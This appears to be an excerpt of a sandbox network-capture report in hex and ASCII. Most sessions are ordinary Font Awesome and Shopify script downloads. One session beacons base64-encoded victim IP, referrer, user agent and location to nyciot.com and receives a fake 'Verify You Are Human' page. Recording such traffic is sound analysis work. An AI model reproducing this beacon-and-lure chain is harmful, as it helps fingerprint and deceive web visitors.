                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 2d 2d 66 61 2d 66 6c 69 70 2d 79 2c 31 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 7a 2c 30 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 61 6e 67 6c 65 2c 2d 31 38 30 64 65 67 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 33 64 28 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 78 2c 30 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 79 2c 31 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 7a 2c 30 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 61 6e 67 6c 65 2c 2d 31 38 30 64 65 67 29 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d
                                                                                                                                                                                              Data Ascii: --fa-flip-y,1),var(--fa-flip-z,0),var(--fa-flip-angle,-180deg));transform:rotate3d(var(--fa-flip-x,0),var(--fa-flip-y,1),var(--fa-flip-z,0),var(--fa-flip-angle,-180deg))}}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 33 30 22 7d 2e 66 61 2d 31 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 31 22 7d 2e 66 61 2d 32 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 32 22 7d 2e 66 61 2d 33 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 33 22 7d 2e 66 61 2d 34 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 34 22 7d 2e 66 61 2d 35 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 35 22 7d 2e 66 61 2d 36 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 36 22 7d 2e 66 61 2d 37 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 37 22 7d 2e 66 61 2d 38 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 38 22 7d 2e 66 61 2d 39 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 39 22 7d 2e 66 61 2d 61 3a 62 65
                                                                                                                                                                                              Data Ascii: 30"}.fa-1:before{content:"\31"}.fa-2:before{content:"\32"}.fa-3:before{content:"\33"}.fa-4:before{content:"\34"}.fa-5:before{content:"\35"}.fa-6:before{content:"\36"}.fa-7:before{content:"\37"}.fa-8:before{content:"\38"}.fa-9:before{content:"\39"}.fa-a:be
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 6f 77 6e 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 38 38 36 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 61 2d 7a 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 6f 72 74 2d 61 6c 70 68 61 2d 61 73 63 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 6f 72 74 2d 61 6c 70 68 61 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 35 64 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 6c 6f 6e 67 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6c 6f 6e 67 2d 61 72 72 6f 77 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 35 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 73 68 6f 72 74 2d 77 69 64 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 6f 72 74 2d 61 6d 6f 75 6e 74 2d 64 65 73 63 3a 62 65 66 6f 72
                                                                                                                                                                                              Data Ascii: own-alt:before{content:"\f886"}.fa-arrow-down-a-z:before,.fa-sort-alpha-asc:before,.fa-sort-alpha-down:before{content:"\f15d"}.fa-arrow-down-long:before,.fa-long-arrow-down:before{content:"\f175"}.fa-arrow-down-short-wide:before,.fa-sort-amount-desc:befor
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 61 2d 61 72 72 6f 77 2d 74 75 72 6e 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6c 65 76 65 6c 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 34 39 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 74 75 72 6e 2d 75 70 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6c 65 76 65 6c 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 34 38 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 36 32 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 75 70 2d 31 2d 39 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 6f 72 74 2d 6e 75 6d 65 72 69 63 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 36 33 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 75 70 2d 39 2d 31 3a 62 65 66 6f 72 65 2c 2e 66 61 2d
                                                                                                                                                                                              Data Ascii: a-arrow-turn-down:before,.fa-level-down:before{content:"\f149"}.fa-arrow-turn-up:before,.fa-level-up:before{content:"\f148"}.fa-arrow-up:before{content:"\f062"}.fa-arrow-up-1-9:before,.fa-sort-numeric-up:before{content:"\f163"}.fa-arrow-up-9-1:before,.fa-


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              104192.168.2.54984545.61.136.1964431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:29 UTC657OUTGET /js.php?device=windows&ip=OC40Ni4xMjMuNzU=&refferer=aHR0cHM6Ly9hbWJpci5jb20vYW1iaXItY2FyZC1zY2FubmVycy8=&browser=Q2hyb21l&ua=bW96aWxsYS81LjAgKHdpbmRvd3MgbnQgMTAuMDsgd2luNjQ7IHg2NCkgYXBwbGV3ZWJraXQvNTM3LjM2IChraHRtbCwgbGlrZSBnZWNrbykgY2hyb21lLzExNy4wLjAuMCBzYWZhcmkvNTM3LjM2&domain=aHR0cHM6Ly9ueWNpb3QuY29t&loc=VVM=&is_ajax=1 HTTP/1.1
                                                                                                                                                                                              Host: nyciot.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:31 UTC267INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:29 GMT
                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: max-age=604800, public
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              2024-11-20 20:28:31 UTC7925INData Raw: 33 64 38 61 0d 0a 20 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 56 65 72 69 66 79 20 59 6f 75 20 41 72 65 20 48 75 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e
                                                                                                                                                                                              Data Ascii: 3d8a <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Verify You Are Human</title> <link rel="stylesheet" href="https://cdnjs.
                                                                                                                                                                                              2024-11-20 20:28:32 UTC7835INData Raw: 38 37 33 22 3e 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 20 23 35 35 35 3b 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 09 09 09 3c 73 70 61 6e 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 20 2d 20 3c 2f 73 70 61 6e 3e 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 20 23 35 35 35 3b 22 3e 54 65 72 6d 73 3c 2f 61 3e 09 09 09 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 76 65 72 69 66 79 2d 77 69 6e 64 6f 77 22 20 63 6c 61 73 73 3d 22 78
                                                                                                                                                                                              Data Ascii: 873"><a href="#" style="text-decoration:none;color: #555;">Privacy</a><span aria-hidden="true" role="presentation"> - </span><a href="#" style="text-decoration:none;color: #555;">Terms</a></div> <div id="verify-window" class="x
                                                                                                                                                                                              2024-11-20 20:28:32 UTC2INData Raw: 0d 0a
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              2024-11-20 20:28:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              105192.168.2.549849185.146.173.204431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:29 UTC389OUTGET /buy-button/latest/buy-button-storefront.min.js HTTP/1.1
                                                                                                                                                                                              Host: sdks.shopifycdn.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1151INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:29 GMT
                                                                                                                                                                                              Content-Type: text/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Link: <https://sdks.shopifycdn.com/buy-button/latest/buy-button-storefront.min.js>; rel="canonical"
                                                                                                                                                                                              Server-Timing: imagery;dur=200.392, imageryFetch;dur=192.716
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              X-Request-Id: 32f2692a-067f-4e82-89b0-00769b60c7e4-1732133355
                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                              X-Dc: gcp-us-central1,gcp-us-east1
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 20:09:15 GMT
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 1082
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9MzdJa%2BAnA84IipkY27gbAEI1ZHSBTQQE9GAELScnofW7IctpOSv5UEyYDW3zOjLEajFwdopRISFSSQWS1uuhmN7HlprVq3eEBtzNYQ4FapLBbyvhMOwJBJO2QHBkiDIWe%2BxUE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server-Timing: cfRequestDuration;dur=22.000074
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fcdfd4c4201-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:29 UTC218INData Raw: 37 62 33 32 0d 0a 2f 2a 20 53 68 6f 70 69 66 79 20 62 75 79 2d 62 75 74 74 6f 6e 2d 73 74 6f 72 65 66 72 6f 6e 74 20 40 33 2e 31 2e 38 20 2a 2f 0a 76 61 72 20 53 68 6f 70 69 66 79 42 75 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 65 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 74 28 65 2c 65 2e 65 78 70 6f 72 74 73 29 2c 65 2e 65 78 70 6f 72 74 73 7d 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 2e 74 6f 53 74 72 69 6e 67 28 29 2e 6d 61 74 63 68 28 22 6e 61 74 69 76 65 20 63 6f 64 65 22
                                                                                                                                                                                              Data Ascii: 7b32/* Shopify buy-button-storefront @3.1.8 */var ShopifyBuy=function(){"use strict";function t(t,e){return e={exports:{}},t(e,e.exports),e.exports}function e(){Function.prototype.bind.toString().match("native code"
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 29 7c 7c 28 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 3d 7a 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 6f 70 74 69 6f 6e 73 2c 6e 3d 65 26 26 65 2e 63 61 72 74 26 26 65 2e 63 61 72 74 2e 73 74 79 6c 65 73 2c 61 3d 65 26 26 65 2e 70 72 6f 64 75 63 74 26 26 65 2e 70 72 6f 64 75 63 74 2e 73 74 79 6c 65 73 2c 69 3d 65 26 26 65 2e 6d 6f 64 61 6c 50 72 6f 64 75 63 74 26 26 65 2e 6d 6f 64 61 6c 50 72 6f 64 75 63 74 2e 73 74 79 6c 65 73 2c 6f 3d 6e 26 26 65 2e 63 61 72 74 2e 73 74 79 6c 65 73 2e 73 75 62 74 6f 74 61 6c 3b 6f 26 26 21 65 2e 63 61 72 74 2e 73 74 79 6c 65 73 2e 64 69 73 63 6f 75 6e 74 41 6d 6f 75 6e 74 26 26 28 74 2e 6f 70 74 69 6f 6e 73 2e 63 61 72 74 2e 73 74 79 6c 65 73 2e 64 69 73 63 6f 75
                                                                                                                                                                                              Data Ascii: )||(Function.prototype.bind=z)}function n(t){var e=t.options,n=e&&e.cart&&e.cart.styles,a=e&&e.product&&e.product.styles,i=e&&e.modalProduct&&e.modalProduct.styles,o=n&&e.cart.styles.subtotal;o&&!e.cart.styles.discountAmount&&(t.options.cart.styles.discou
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 61 72 20 72 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 42 6c 6f 62 28 5b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6f 29 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 70 6c 61 69 6e 22 7d 29 3b 69 66 28 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 28 55 74 2c 72 29 29 72 65 74 75 72 6e 21 30 7d 76 61 72 20 64 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 74 72 79 7b 64 2e 6f 70 65 6e 28 22 50 4f 53 54 22 2c 55 74 29 2c 64 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 2c 22 74 65 78 74 2f 70 6c 61 69 6e 22 29 2c 64 2e 73 65 6e 64 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6f 29 29 7d 63 61 74 63 68 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 74 29 7d
                                                                                                                                                                                              Data Ascii: ar r=new window.Blob([JSON.stringify(o)],{type:"text/plain"});if(window.navigator.sendBeacon(Ut,r))return!0}var d=new XMLHttpRequest;try{d.open("POST",Ut),d.setRequestHeader("Content-Type","text/plain"),d.send(JSON.stringify(o))}catch(t){console.error(t)}
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 76 65 72 73 69 6f 6e 3a 6f 2e 76 65 72 73 69 6f 6e 2c 70 61 79 6c 6f 61 64 3a 64 7d 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 29 7b 76 61 72 20 6e 2c 61 3d 68 28 74 29 2c 69 3d 5f 28 74 29 2c 6f 3d 4c 28 7b 7d 2c 65 2c 61 2c 28 6e 3d 7b 7d 2c 42 28 6e 2c 78 74 2c 74 2e 69 64 29 2c 42 28 6e 2c 4f 74 2c 74 2e 64 65 73 74 69 6e 61 74 69 6f 6e 29 2c 42 28 6e 2c 53 74 2c 69 29 2c 42 28 6e 2c 45 74 2c 74 2e 63 68 65 63 6b 6f 75 74 50 6f 70 75 70 29 2c 6e 29 29 3b 72 65 74 75 72 6e 7b 69 64 3a 22 62 75 79 5f 62 75 74 74 6f 6e 5f 6a 73 5f 76 69 65 77 65 64 5f 70 72 6f 64 75 63 74 5f 63 61 74 65 67 6f 72 79 22 2c 76 65 72 73 69 6f 6e 3a 22 31 2e 30 22 2c 70 61 79 6c 6f 61 64 3a 6f 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 61 28
                                                                                                                                                                                              Data Ascii: version:o.version,payload:d}}function C(t,e){var n,a=h(t),i=_(t),o=L({},e,a,(n={},B(n,xt,t.id),B(n,Ot,t.destination),B(n,St,i),B(n,Et,t.checkoutPopup),n));return{id:"buy_button_js_viewed_product_category",version:"1.0",payload:o}}function k(){for(var t=a(
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 72 2c 50 74 2c 74 2e 69 64 29 2c 42 28 72 2c 41 74 2c 74 2e 6e 61 6d 65 29 2c 42 28 72 2c 46 74 2c 74 2e 70 72 69 63 65 7c 7c 22 22 29 2c 42 28 72 2c 49 74 2c 74 2e 71 75 61 6e 74 69 74 79 29 2c 69 3d 72 7d 74 2e 73 6b 75 26 26 28 69 5b 54 74 5d 3d 74 2e 73 6b 75 29 3b 76 61 72 20 64 3d 4c 28 7b 7d 2c 65 2c 6e 2c 69 29 3b 72 65 74 75 72 6e 7b 69 64 3a 61 2e 69 64 2c 76 65 72 73 69 6f 6e 3a 61 2e 76 65 72 73 69 6f 6e 2c 70 61 79 6c 6f 61 64 3a 64 7d 7d 66 75 6e 63 74 69 6f 6e 20 46 28 74 2c 65 29 7b 76 61 72 20 6e 2c 61 3d 68 28 74 29 2c 69 3d 28 6e 3d 7b 7d 2c 42 28 6e 2c 78 74 2c 74 2e 70 72 6f 64 75 63 74 49 64 29 2c 42 28 6e 2c 77 74 2c 74 2e 6e 61 6d 65 29 2c 42 28 6e 2c 50 74 2c 74 2e 69 64 29 2c 42 28 6e 2c 41 74 2c 74 2e 76 61 72 69 61 6e 74 4e 61
                                                                                                                                                                                              Data Ascii: r,Pt,t.id),B(r,At,t.name),B(r,Ft,t.price||""),B(r,It,t.quantity),i=r}t.sku&&(i[Tt]=t.sku);var d=L({},e,n,i);return{id:a.id,version:a.version,payload:d}}function F(t,e){var n,a=h(t),i=(n={},B(n,xt,t.productId),B(n,wt,t.name),B(n,Pt,t.id),B(n,At,t.variantNa
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 74 5b 65 5d 3d 6e 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 65 29 7b 74 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 65 2e 70 72 6f 74 6f 74 79 70 65 29 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 74 2c 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                              Data Ascii: le:!0,writable:!0}):t[e]=n,t}function a(t,e){t.prototype=Object.create(e.prototype),t.prototype.constructor=t,t.__proto__=e}function i(t){if(void 0===t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return t}function
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 72 65 74 75 72 6e 20 6d 28 74 2c 65 29 7d 29 29 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 79 28 74 2c 65 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 6e 75 6c 6c 2c 61 3d 74 2e 74 79 70 65 73 5b 65 5d 3b 69 66 28 61 29 72 65 74 75 72 6e 20 61 3b 69 66 28 6e 26 26 22 49 4e 54 45 52 46 41 43 45 22 3d 3d 3d 6e 2e 6b 69 6e 64 29 72 65 74 75 72 6e 20 6e 3b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 4e 6f 20 74 79 70 65 20 6f 66 20 22 2b 65 2b 22 20 66 6f 75 6e 64 20 69 6e 20 73 63 68 65 6d 61 22 29 7d 66 75 6e 63 74 69 6f 6e 20 67 28 74 29 7b 72 65 74 75 72 6e 20 65 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 50 72 6f
                                                                                                                                                                                              Data Ascii: return m(t,e)})):e}function y(t,e){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:null,a=t.types[e];if(a)return a;if(n&&"INTERFACE"===n.kind)return n;throw new Error("No type of "+e+" found in schema")}function g(t){return en.prototype.isPro
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 72 65 74 75 72 6e 20 70 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3f 22 69 64 22 3d 3d 3d 74 2e 6e 61 6d 65 3a 21 28 21 66 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 7c 7c 21 74 2e 73 65 6c 65 63 74 69 6f 6e 53 65 74 2e 74 79 70 65 53 63 68 65 6d 61 2e 69 6d 70 6c 65 6d 65 6e 74 73 4e 6f 64 65 29 26 26 77 28 74 2e 73 65 6c 65 63 74 69 6f 6e 53 65 74 2e 73 65 6c 65 63 74 69 6f 6e 73 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 70 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3f 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3d 3d 3d 74 2e 6e
                                                                                                                                                                                              Data Ascii: return pn.prototype.isPrototypeOf(t)?"id"===t.name:!(!fn.prototype.isPrototypeOf(t)||!t.selectionSet.typeSchema.implementsNode)&&w(t.selectionSet.selections)})}function P(t){return t.some(function(t){return pn.prototype.isPrototypeOf(t)?"__typename"===t.n
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 43 6e 2c 5b 6e 75 6c 6c 5d 2e 63 6f 6e 63 61 74 28 5b 74 5d 2c 61 29 29 29 3a 6e 65 77 28 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 2e 61 70 70 6c 79 28 6b 6e 2c 5b 6e 75 6c 6c 5d 2e 63 6f 6e 63 61 74 28 5b 74 5d 2c 61 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 54 28 74 29 7b 72 65 74 75 72 6e 20 31 21 3d 3d 74 2e 6c 65 6e 67 74 68 26 26 28 56 28 74 29 7c 7c 4f 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 6e 61 6d 65 3d 3d 3d 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 74 29 7b 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 4e 75 6c 6c 5d 22 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74
                                                                                                                                                                                              Data Ascii: Cn,[null].concat([t],a))):new(Function.prototype.bind.apply(kn,[null].concat([t],a)))}function T(t){return 1!==t.length&&(V(t)||O(t))}function U(t,e){return t.some(function(t){return t.name===e})}function D(t){return"[object Null]"!==Object.prototype.toSt
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 2c 64 3d 76 6f 69 64 20 30 3b 64 3d 67 28 69 2e 73 65 6c 65 63 74 69 6f 6e 2e 61 72 67 73 2e 66 69 72 73 74 29 3f 69 2e 73 65 6c 65 63 74 69 6f 6e 2e 61 72 67 73 2e 66 69 72 73 74 3a 62 28 22 66 69 72 73 74 22 2c 22 49 6e 74 22 2c 69 2e 73 65 6c 65 63 74 69 6f 6e 2e 61 72 67 73 2e 66 69 72 73 74 29 3b 76 61 72 20 63 3d 7b 61 6c 69 61 73 3a 69 2e 73 65 6c 65 63 74 69 6f 6e 2e 61 6c 69 61 73 2c 61 72 67 73 3a 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 69 2e 73 65 6c 65 63 74 69 6f 6e 2e 61 72 67 73 2c 7b 61 66 74 65 72 3a 61 2c 66 69 72 73 74 3a 64 7d 29 7d 3b 74 2e 61 64 64 43 6f 6e 6e 65 63 74 69 6f 6e 28 69 2e 73 65 6c 65 63 74 69 6f 6e 2e 6e 61 6d 65 2c 63 2c 72 2e 73 65 6c 65 63 74 69 6f 6e 53 65 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 52 28 74
